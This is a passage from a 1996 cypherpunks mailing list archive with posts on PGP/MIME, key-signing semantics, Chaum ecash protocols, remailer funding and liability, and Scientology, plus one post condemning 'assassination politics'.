> multimedia data, and which can not be examined with commonly available
> inspection tools, it is inevitable and predictable that sooner or later
> this will cause some kind of negative security event.

By this argument nobody should bother signing e-mail or news posts.  I
haven't seen any good tools to handle this easily for PC's and Macs.
New proposals have to be made before the tools become available.  This
draft is the result of experience with what does and doesn't work.
For example, the application/pgp content-type which many people like
is horribly broken for what it's probably used for 95% of the time.

> There is no good reason to sign the base64 rather than the original
> data. Once a file has been base64ed, the file can not be examined
> with the usual inspection tools.

Yes, base64 is just another stream of bytes, but there are FEW places on
the Internet SMTP framework that can support BINARY transport.  BINARY
streams often contain very long lines which existing software simply can't
handle.

There is also another reason to sign the encoded version.  Remember that
it also includes the content headers of that part.  This is very important
especially for automated processing of messages.

> The typical user of MIME software is not necessarily technically
> sophisticated. When the deficiencies and disasters associated with
> software patterned on this draft become apparent, not everyone will know
> exactly which software component is at fault. The problems associated
> with the draft (or its successors) may adversely affect the reputation
> of PGP.

Bad implementations can always adversely affect your reputation, even if
the theory behind it is solid.  The average non-technical user which you
have been describing in this message will should not even be aware of
the underlying details if the implementation is done correctly.

> The draft should be withdrawn. People should rethink and create a better
> plan to combine the benefits of PGP and MIME.

You are more than welcome to submit your proposal the the pgp-mime mailing
list.  [send mail to pgp-mime-request@lists.uchicago.edu with a subject of
"subscribe"]

We've seen a lot of different proposals go by, and none of them have stood
up to PGP/MIME.  From my point of view, most of the problems that people
have with the draft is their failure to understand what it is to be used
for.  Many people have the impression that PGP/MIME is meant to be the
end-all-be-all for PGP.  But it's not!  PGP/MIME is meant to securely
transmit messages across the Internet in a manner which all platforms
can use.  PGP/MIME is text based because most transport systems in use
are.  Nowhere is anyone saying "thou shalt not use PGP without MIME."
I think if more people understood that, we wouldn't have so many
objections to it.

> It should not require any additional space overhead  (more than that
> which may be necessary for transport) when signing and encrypting.

The note in parens is interesting.  What you consider overhead I consider
necessary for transport.

me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 May 1996 15:09:08 +0800
To: cypherpunks@toad.com
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605201123.EAA12454@netcom23.netcom.com>
Message-ID: <Pine.GUL.3.93.960520101553.345A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Dave Harman wrote:

> Qut may attend the meeting to verify the racial compositions of the group.
> Results will be reported here.

Please do. I'll buy you a beer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 15:03:53 +0800
To: cypherpunks@toad.com
Subject: The Ontology of Nyms, Trust, Belief, etc.
Message-ID: <adc5f36b1002100442a7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[I've changed the thread name from "Sen. Leahy..."]

At 10:50 AM 5/20/96, bryce@digicash.com wrote:

>Indeed we have, and it verged on philosophical territory, and
>I would really enjoy discussing the issue again with you
>sometime, although perhaps we've gotten about as much as we can
>get out of it in e-mail.

Yes, I also enjoyed the MITM ontological debate--up to a point. Technology
reifies what were once philosophical abstractions, and brings them to the
fore.

>Unfortunately PGP 2 only allows one kind of certificate.  The
>"key-signature".  To PRZ and most other people, it is a
>certificate asserting a mapping between a key and a true name.
>To me it is as I described above.  To TCMay, it is a kind of
>endorsement.  It's just too bad that PGP 2 doesn't have
>different _kinds_ of certificates to represent these different
>assertions.  Until a certificate technology like that is
>implemented, and probably even after that time, we need to
>avoid confusing these various meanings for "key-signatures".

I agree with this point, that the "scalar" nature of key-signings is not
very rich.

A Digression on Tensors: The next step up would presumably be "vector"
signings, where one has multiple attributes, just as with ratings, reviews,
etc. And the step after that would be "tensor" signings--it's perhaps a
leap into the abyss, but tensors have an interesting property that a value
in one direction, for example, and a value in another direction, say, do
not "vector add" to some resultant value. While "wind" acts as a vector
field, with a north wind and and a west wind giving a northwest resultant,
think of "stress" (as in a crystal, a piece of glass, a structural member):
stress in one direction is independent of stress in another direction, and
they don't add as vectors do. Hence, the "stress-energy tensor" is needed
to describe the stress in a material...or the gravitational field!

(This is just a conjecture that this model might be useful at some point.
Near term, I think even having "user-defined" belief fields would be a
useful step. And I don't think it needs to be hacked into a next version of
PGP...it seems better to add these things on later.)


>Now more seriously, the alacrity with which I bring up
>disagreements with Tim should in fact be construed as a measure
>of my _respect_ for his opinions and for his mind, rather that
>as a lack of respect for same.

Thanks, and I promise I'll respect you in the morning, too. (g)

That several of us (and probably many of those who aren't commenting) have
differing interpretations of key signings, trust, belief, identity, proof,
etc., is not surprising to me.

(I didn't put "Licensed Ontologist" in my .sig for nothing. Actually, it's
also meant as a tweak of some local Santa Cruzans who want professions
licensed by the State and ordered to report various forms of physical,
psychic, and existential "abuse" to the proper licensing authorities. I get
a great rise out of them (in scruz.general) by announcing that "my clinic"
refuses to narc out its patients to the authorities...I love getting
threats from them saying that they plan to contact Sacramento to "have your
license revoked." Predictably, and sadly, I've never gotten a call from any
state authorities on this...I can always hope.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 May 1996 15:03:27 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The Crisis with Remailers
Message-ID: <199605201722.KAA05155@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:01 AM 5/20/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com" 17-MAY-1996 15:56:36.35
>
>>Perhaps what is needed is a non-profit, charitable 501c foundation to
>>encourage anonymous communication.  Those who support the idea could make
>>tax deductible contributions which would be used for grants, public
>>education etc. etc. to encourage anonymous communication.  It could be
>>called, "The Federalist Foundation" because the Federalist Papers were
>>published anonymously.
>
>        Hmm... I wonder if it would be good for this Foundation to itself
>operate some for-pay remailers, in order to make some money from sources
>besides contributions? Possible disadvantages:
>        A. It could get sued, and thus lose funds
>        B. If its prices were set too low, it could wind up driving other
>remailers out of the market (combination of low price with likelihood to still
>be there), and thus become a vulnerable point.

In general, I think this foundation should limit itself to:

(1) Supporting the creation of techniques for anonymous communication (e.g
remailers, nym servers etc.)  This could include grants for theoretical
work and grants for the production of out-of-the-box public domain systems.

(2) Public education on the need and value of anonymous communication.

(3) Demonstration projects to help create a market where none exists.

Whenever there is a market, the foundation, like governments, should not
participate as a competitor.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 15:22:42 +0800
To: cypherpunks@toad.com
Subject: Religions, Scientology, and Ritual Cannibalism
Message-ID: <adc5f94f11021004a4e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:53 PM 5/20/96, jamesd@echeque.com wrote:
>At 01:08 AM 5/20/96 -0700, Timothy C. May wrote:
>> But any country that is "anti-Scientology" is likely to be
>> repressive in various ways we would find inimical to our goals.
>> [...]
>>
>> (The issue of how believable the claims of CoS are is no more relevant than
>> similarly outlandish claims that taking communion is eating the flesh of
>> JC.)
>
>The Australian law is (or was) based on the idea that if you charged someone
>$2500 for eating the flesh of christ, it then becomes legitimate for the
>government to check out whether or not the customer was getting actual
>flesh of Christ.  This seems to me a lot less repressive than the American
>FDA.

Caveat: I'm an atheist, a non-believer in the supernatural. When I die, my
CPU and consciousness will vanish. If there are various gods and goddesses,
sprites, trolls, Supreme Being(s), I see no evidence of them.

Having said this, I don't want _any_ government intervening in religion,
for any purposes. If the Church of Zed says that one's tithing to the
Church will buy one eternal salvation and healthy gums, I don't want some
government demanding to see "proof."

(Inasmuch as at most one religion is right, this makes the remaining N - 1
religions automatically fraudulent in some sense. This is why the
"Schelling point" in mostly-free societies is "we won't interfere with
religions and their various bizarre claims...caveat emptor.")

As far as I'm concerned, if a church can convince some yokels to pay $2500
for getting to eat a couple of pounds of Jesus every year (cooked, or Jesus
tartare?), I'd say they've got a pretty good racket going.

More supernatural power to them, I say!

(And if the Clams can convince some out-of-work actors in Hollywood to pay
$250,000 to be e-metered, have their engrams analyzed, and eventually "go
clear," it seems like L. Ron made good on his bar bet with Heinlein that he
could invent a new religion and make millions of buck. As another SF put
it, "think of it as evolution in action.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 21 May 1996 15:09:48 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: The Crisis with Remailers
In-Reply-To: <4nq6qp$3fl@abraham.cs.berkeley.edu>
Message-ID: <199605201740.KAA07336@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Another problem with postage in Mixmaster:  the minimum ecash payment is
> $0.01.  Do we want to charge that much for email?  Need we consider
> micropayments?
> 

	one cent could well be too low.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 21 May 1996 10:46:49 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <2.2.32.19960520181550.006864b8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:08 AM 5/20/96 -0700, tcmay@got.net (Timothy C. May) wrote:
[snip]
>And the issue of CoS seeking legal actions against those they claim are
>violating their copyrights is separable from their religious status.

Not at all.  Their actions are based on their religious doctrines, as passed
down by Hubbard.  "Always attack, never defend."  Their claims of copyright
violation are part of an ongoing effort to silence those who criticize their
illegal and immoral practices.  They should be examined in that context.

> As I
>have said many times, "Newsweek" would likely take similar actions in
>similar circumstances.)

AFAIK, "Newsweek" does not file lawsuits just for the purpose of harassment,
as Hubbard counselled his followers to do.  AFAIK, "Newsweek" does not hire
PIs to harass those who criticize them.

Tim, do you think "Newsweek" articles have ever been posted to the Net?  If
so, did the magazine sue everyone who posted them?  The "Church" doesn't
even want to admit that fair use is a possibility.

"Newsweek" is also not a non-profit coporation.  Not only is CoS tax exempt,
but they claim to have "trade secrets" as well.  That's having your cake and
eating it...


Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <tim@dierks.org>
Date: Tue, 21 May 1996 15:10:35 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <v02140b0aadc66b47f5b3@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 AM 5/20/96, Ian Goldberg wrote:
>In article <199605190626.BAA62897@rs5.tcs.tulane.edu>,
>Matthew Carpenter  <mcarpent@mailhost.tcs.tulane.edu> wrote:
>>My PDA receives
>>back any coins as change if needed, and logs info about the transaction
>>for my financial records.
>>
>>When I get back home I 'deposit' my change using the same ATM interface.
>>This also removes from my home computer the copies of the coins I spent,
>>and automatically updates the transaction records on my PC.
>>
>>So are there any flaws with above procedure?
>
>Yup; with the current protocols, there's no way to do change.  For the shop
>to pay you change, besides suddenly losing your anonymity as a payee, you
>would have to go online immediately to clear the coins, which assumedly
>is infeasable.
>
>However, if you use the "fully anonymous" protocol, change becomes trivial.
>You don't have to go online; the payer (the shop) does, which it assumedly
>already is.  Another benefit is that coins received in this way as change
>are immediately spendable by you, without having to go online in between.
>
>The "fully anonymous" protocol turns out to be _exactly_ what is needed
>for situations like this.

Not that full anonymity isn't a Good Thing, but couldn't this be solved by
having the merchant (who presumably is on-line) provide PDA <-> mint
connectivitiy for the purposes of getting change, exchanging coins, etc.?
My assumption is that all the ecash protocols are not subject to a MITM
attack, which I would just presume to be good practice.

Also, given the fully anonymous protocol as you've described it (both payor
and payee blind the coins), what's to prevent the merchant from depositing
your change before he gives it to you? Unless your PDA is online, you'll be
home before you find out the hot dog vendor shorted you. (It's my
understanding that the current digicash system does not support Chaum's
method of revealing the identity of double-spenders).

 - Tim

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 21 May 1996 08:51:42 +0800
To: cypherpunks@toad.com
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605201123.EAA12454@netcom23.netcom.com>
Message-ID: <199605201541.LAA17549@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dave Harman writes:
> Qut may attend the [cypherpunks] meeting to verify the racial
> compositions of the group.

Why? You have something against black people?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 21 May 1996 15:09:37 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <2.2.32.19960520184232.0076cc40@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 5/20/96 -0700, jamesd@echeque.com wrote:
>At 02:08 AM 5/20/96 EDT, you wrote:
>>	What countries are noticeable for being anti-Scientology? 
>>       They would appear to be good locations for special-purpose 
>>       remailer ultimate-output ends.
>
>Scientology was illegal in Australia last time I heard.  They declared
>that you could not be a religion and charge a fee for religious service
>the way that Scientology charges.  They then defined them as practicing
>medicine, and hit them with snake oil laws.

And Germany, or course, as Tim mentioned.  CoS suckered the US State Dept.
into putting pressure on the Germans, and the Scientologists on a.r.s. have
made plenty of Nazi allusions when discussing the German "bigotry."

I know that there was a big crackdown in England while Hubbard was still
alive, though the anti-Scientology laws there were rescinded some time ago,
I believe.  At one point foreign Scientologists weren't allowed into the
country.  There may still be a lot of anti-CoS sentiment there.

Ironically, if someone had asked me this questions a few weeks ago, I
probably would have answered, "The Netherlands."


Rich

p.s.  I'm a bit more caught up on my facts now.  The NOTS materials (newer
than the OT materials in the Fishman affidavit) were posted to a.r.s.
through hacktic recently.  I'm assuming that was the cause of the CoS
pressure to shut them down.  The NOTS materials were not in the public
record (like parts of the old OT materials were, as they were evidence in
the Fishman case), so the court's ruling in the case against Karin Spaink
and her ISP, XS4ALL, wouldn't seem to apply towards their being posted.
IANADL (I am not a Dutch lawyer...)


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 21 May 1996 15:29:22 +0800
To: cypherpunks@toad.com
Subject: Re: Toastmasters?
In-Reply-To: <Pine.SUN.3.93.960520074728.29440C-100000@polaris.mindport.net>
Message-ID: <DPH9ND2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> On Mon, 20 May 1996, Senator Exon wrote:
> 
> > How do corporations work, in terms of liability?  If the cost of 
> > incorporating isn't forbidding, I would think a remailer operator might 
> > consider incorporating a company, and making the remailer a function of 
> > that company.  That way, any losses are restricted to the total value of 
> > the corporation; that is, nothing.  Any flaws?  There must be something 
> > wrong with it somewhere.
> 
> All the corporate officers are public knowledge.

You seem to be confused. If the corporation isn't publicly traded, why should
any information other than the address for service of process be public?

> The corporate veil can pretty easily be perferated if there is a willful
> attempt to avoid liability when conduct gets above a certain threshold.
> 
> This would be pretty easy to show in the event the corporation never made
> dime one and never intended to.

What if the corporation intends to collect e-cash for operating the remailer?

(Of course, one can still be sued...)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 May 1996 15:48:27 +0800
To: Ian Goldberg <cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <199605201902.MAA16278@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:10 AM 5/20/96 -0700, Ian Goldberg wrote:
>However, if you use the "fully anonymous" protocol, change becomes trivial.
>You don't have to go online; the payer (the shop) does, which it assumedly
>already is.  Another benefit is that coins received in this way as change
>are immediately spendable by you, without having to go online in between.

Perhaps I am confused, but I see no need for change in the fully anonymous
protocol.  I see the fully anonymous protocol as:

(1) The payee generates a coin for the amount of purchase, blinds it and
gives it to the payer.
(2) The payer blinds it again and gives it to the bank, which signs it
debiting the payer's account.
(3) The payer removes his blinding and gives the signed coin to the payee.
(4) The payee removes his blinding and deposits the coin.

Step 1 could be called a request for payment (an invoice), step 2 a
withdrawal, step 3 the payment, and step 4 a deposit.

Is there another version which allows the payee to have an unconnected
wallet of coins and get change in return?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 21 May 1996 15:20:57 +0800
To: cypherpunks@toad.com
Subject: Re: My meeting with Chaum (Also: ecash full anonymity and a legal question)
Message-ID: <v02120d09adc6760def8c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:13 5/20/96, Jüri Kaljundi wrote:

>BTW why isn't some other company besides DigiCash selling similar software
>product as the Ecash mint & client?

Not that I am aware of. David Chaum (DigiCash) holds the patents on the
blinding technology that lies at the core of Ecash.

>Public domain ecash software would be an interesting effort to accomplish.
>In case of full source availability it should be possible to develop
>commercial systems based on public software, it might even be more secure
>than commercial software which source is available for review to only
>certain persons.

Coin based software that uses blinding would infringe on DC's patents.

>There is also a problem with Digicash licensing: they licence only to
>banks, and usually only to one bank in each country.

That is not the case. At this time, there is only one Ecash issuing bank in
each country that has an Ecash issuing bank. There is no reason why there
might not be several Ecash issuing banks in a given country in the future.

>I believe there are
>also many companies that are not banks, who would also like to issue ecash
>for specific purposes.

Such companies could negotiate a deal with one of the current Ecash issuers
in which the company gets exclusive use of one of the many currencies that
all Ecash mints are capable of issuing.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 21 May 1996 15:24:59 +0800
To: jf_avon@citenet.net
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <9605200337.AA02122@cti02.citenet.net>
Message-ID: <199605201934.MAA28228@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon appears to be a new vocal proponent for Jim Bell's
"assassination politics". he quotes my private mail in his
latest sniveling defense.

>Second, everybody like Jim Bell who is pushing the AP scheme is doing
>so on ethical basis: that the coercion the government imposes on to
>the individuals by regulations, and guns backed taxation justifies the
>killings.  I have to see yet any cypherpunks who seems to agree with
>AP that envision another use than govt control.

right, and Hitler didn't have any other use for his government other
than to bring utopia to the masses, and used all the ovens for cooking
pizzas (after all, what else could an oven be used for?!?!?).

the above sentence I find absolutely abhorrent: it justifies killing,
not merely because of the effect (the sort of "ends-justifies-the-means"
argument used by most here), but that in addition it is 
supposedly "ethical". ethical?!?!? for g*d's sakes, promote your
depraved scheme under any other heading, but do not claim it is
"ethical" unless you want to further demonstrate how far from
morality you have twisted your brain.

the assassination politics is quite Hitleresque at its root.
"kill our enemies, and everything will be better. it is our enemies
that are the root of all evil in the world. extinguish them, and
you solve all problems automatically"

such is the total moral perversion of the thinking behind 
"assassination politics". most of the adherents work from the 
following argument, nicely summarized by JFA above:

1. the government is corrupt

2. therefore, it is okay to kill people who further that corruption.

wow, what brilliant logic. I must admit it proves to be superior to
that embodied by any second grader, a high accomplishment for its
proponents.

there is a trite saying, "two wrongs do not make a right" (trite
because most have mastered the simple truth of it in their pre-teen
years). a concept not grasped by some second-graders. some 
require a lifetime of lessons to comprehend it in the end..

I'm very disappointed that others have not chased Assassination
Politics proponents to take their trash somewhere else. of course
the real situation is that those that started this list have
sympathies for this kind of thinking, so no such thing will happen.

to Jim Bell and Avon: please read Machiavelli. read about ancient
assassination clubs and the history of bloody politics. if you want
to seriously further your ideas, start a web site with ample 
historical research. your ideas are not new whatsoever. if you
really wish to become masters of assassination abilities, study
carefully the errors of those who have come before you. write
a long treatise with lots of footnotes to past assassination
difficulties and how you would advance past them. I tell
you flat out that any respectable assassin would be quite embarrassed
to be associated with you at the moment because of your arrogance
and ignorance.

I wish you the best of luck <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 20 May 1996 23:54:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Senator, your public key please?
In-Reply-To: <adc3916e04021004f2b9@[205.199.118.202]>
Message-ID: <199605201050.MAA13366@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 TCMay probably wrote something like:
>
> At 8:38 PM 5/18/96, bryce@digicash.com wrote:
> 
> ...(my points elided)...
> 
> >All of these are products of misconceptions between using the
> >WoT to certify identities, versus using it to certify how much
> >you trust a person to certify someone else's identify, versus
> >using it to certify arbitrary other qualities about a person.
> 
> Bryce, we've differed several times before about the web of trust,
> especially "man-in-the-middle" issues. This looks to be the same sort of
> issue.


Indeed we have, and it verged on philosophical territory, and 
I would really enjoy discussing the issue again with you 
sometime, although perhaps we've gotten about as much as we can 
get out of it in e-mail.


But I think that _this_ issue is a lot simpler, and a lot easier
for us to agree on.  To wit:


> I personally don't see key-signings as mainly useful for verifying the
> "true name" of someone whose key I sign. (I don't check birth certificates,
> passports, driver's licenses, etc.)
>
> Rather, I view _my_ key signings as forms of vouching, or endorsement. Not
> of all views, naturally, but as a statement that the person whose key I am
> signing is someone I know and "trust" (in the sense that the key belongs to
> the person I "know." Thus, I know Eric Hughes, even though he may actually
> be Fritz Kacynski, drop-out math student.


Sure.  For my part, _I_ personally don't see key-signings as
mainly useful for verifying the "true name" of someone.  Rather
I view _my_ key signings as verifying that (for one reason or
other), I believe the owner of the key to be the originator of
the information that is published under that key (= nym).


All I am saying by talking of "misconceptions between using the
WoT to certify identities, versus using it to certify [...]
other qualities", is that each of these different uses of key-
signings are.. well..  _different_, and they shouldn't be
mistaken for one another.


Unfortunately PGP 2 only allows one kind of certificate.  The
"key-signature".  To PRZ and most other people, it is a
certificate asserting a mapping between a key and a true name.
To me it is as I described above.  To TCMay, it is a kind of
endorsement.  It's just too bad that PGP 2 doesn't have
different _kinds_ of certificates to represent these different
assertions.  Until a certificate technology like that is
implemented, and probably even after that time, we need to
avoid confusing these various meanings for "key-signatures".


> I believe different agents will use these belief networks in different
> ways. Some will be focused on the issue of True Names and will calculate
> beliefs on the basis of how much they think the key-signers are being
> diligent enough in checking identities. Others will use belief networks to
> convey trust that one is not a government agent (a practical example being
> the use of PGP and webs of trust in the jungles of Burma, where I am quite
> sure the "keyrings" did not deliberately include government agents,
> regardless of how well they "proved" their identity!
> 
> There is no single ontological interpretation of belief networks.


Well here we have that epistemological issue again.  I believe
that there is a single "proper" or "best" ontological
interpretation of many or most belief networks.  (At least, of 
the belief networks that we care about.)  But skipping that
issue, my point in this post is just that there should be
informtion encoded in these belief nets/WoT's which
differentiates the different kinds.


Note that it is possible to differentiate between two meanings
without admitting that their meanings are meaningfully
ascertainable by humans...


<note: quote out of order>

> Bryce, I respect your views on this and MITM issues, but the fact that we
> view things differently (and that Phil Z. views things differently from
> you, and perhaps from me) should not always be ascribed by you as
> "reflecting lack of understanding."


Hey, maybe I should be more humble, or more gentle, but this is
the Internet, you know?  Here, I'll present a representation of
my internal Bayesian belief network with explicit mention of the
certainty qualifications:

"A.  Since Tim and I view things differently with respect to
this subject, one of us is wrong.
A's certainty: 0.95

B.  I am right.
B's certainty: 0.93

C.  (from A,B)  Tim is wrong.
C's certainty: (from A,B)  0.93*0.95=0.8835"


Now more seriously, the alacrity with which I bring up 
disagreements with Tim should in fact be construed as a measure
of my _respect_ for his opinions and for his mind, rather that
as a lack of respect for same.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: http://www.c2.net/~bryce/ -- 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaBOXEjbHy8sKZitAQGqOQMAg5PBy6raiNd2gyy35h9F5CDGxmFTprE9
Ff55OWlPlY/+LM55+Vby94QJ6Df+pNby8yLmRudGZA7OXNeFArKu11AQyd3OXm6N
mY9RobZQ+t5aawB9CMtGnsR8NvC/LJU0
=wKml
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Tue, 21 May 1996 15:06:51 +0800
To: cypherpunks@toad.com
Subject: Interesting bit in the US ecash License Agreement...
Message-ID: <199605202023.NAA04344@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's a bit of the US license agreement for the ecash software that some
of you may have missed:

> The downloaded software is licensed only for and will be used only for
> your internal testing as part of the aforementioned experiment, subject
> to all the terms and conditions of this Agreement, and will not be
> sublicensed or made available to any third party or used directly or
> indirectly for revenue generating or commercial purposes.

Note that last clause.  It seems (probably due to the client using RSAREF,
or something like that) that using the ecash software "directly or
indirectly for revenue generating or commercial purposes" is illegal.

Someone might want to fix that...

   - Ian "read _before_ you sign"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaDUdUZRiTErSPb1AQERugQAx200/FFgIyC6/bBMoKUqlNFy97dcyo3K
Zh40GsltK03Pdv551lZAjZ0T5wtjJBlhpCFgECiPRsU0D7TxYgbkQcGpKl0HwFn1
fCIjPAbcKPgnhq6/Emu4MAywqiB38MX3K5bXH13N2NVu27aucP5Xm/K4iTcGSBRT
Sz5rQxa6cQ4=
=S+zL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 21 May 1996 15:05:59 +0800
To: jamesd@echeque.com
Subject: encrypted open books
In-Reply-To: <199605201958.MAA28257@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.93.960520132108.25932A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996 jamesd@echeque.com wrote:

> Look up cypernomicon, "open encrypted books"

There is indeed a short section in the Cyphernomicon about encrypted open
books.  Unfortunately it doesn't describe it in detail, and since the
hks.net archive is down, I can't look up Eric Hughes' original e-mail on
the topic.  If anyone has a copy of it in his personal archive, please
repost it.  I'm sure other people would be interested as well.

Here is the section from Cyphernomicon:

 12.16.1. Encrypted open books, or anonymous auditing
           - Eric Hughes has worked on a scheme using a kind of blinding
              to do "encrypted open books," whereby observers can verify
              that a bank is balancing its books without more detailed
              looks at individual accounts. (I have my doubts about
              spoofs, attacks, etc., but such are always to be considered
              in any new protocol.)
           - "Kent Hastings wondered how an offshore bank could provide
              assurances to depositors.  I wondered the same thing a few
              months ago, and started working on what Perry calls the
              anonymous auditing problem.  I have what I consider to be
              the core of a solution.
              ...The following is long.... [TCM Note: Too long to include
              here. I am including just enough to convince readers that
              some new sorts of banking ideas may come out of
              cryptography.]
              
              "If we use the contents of the encrypted books at the
              organizational boundary points to create suitable legal
              opbligations, we can mostly ignore what goes on inside of
              the mess of random numbers.  That is, even if double books
              were being kept, the legal obligations created should
              suffice to ensure that everything can be unwound if needed.
              This doesn't prevent networks of corrupt businesses from
              going down all at once, but it does allow networks of
              honest businesses to operate with more assurance of
              honesty." [Eric Hughes,  PROTOCOL: Encrypted Open Books,
              1993-08-16]
  
Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 21 May 1996 15:07:43 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: anonymous companies
In-Reply-To: <Pine.SUN.3.93.960520074656.29440B-100000@polaris.mindport.net>
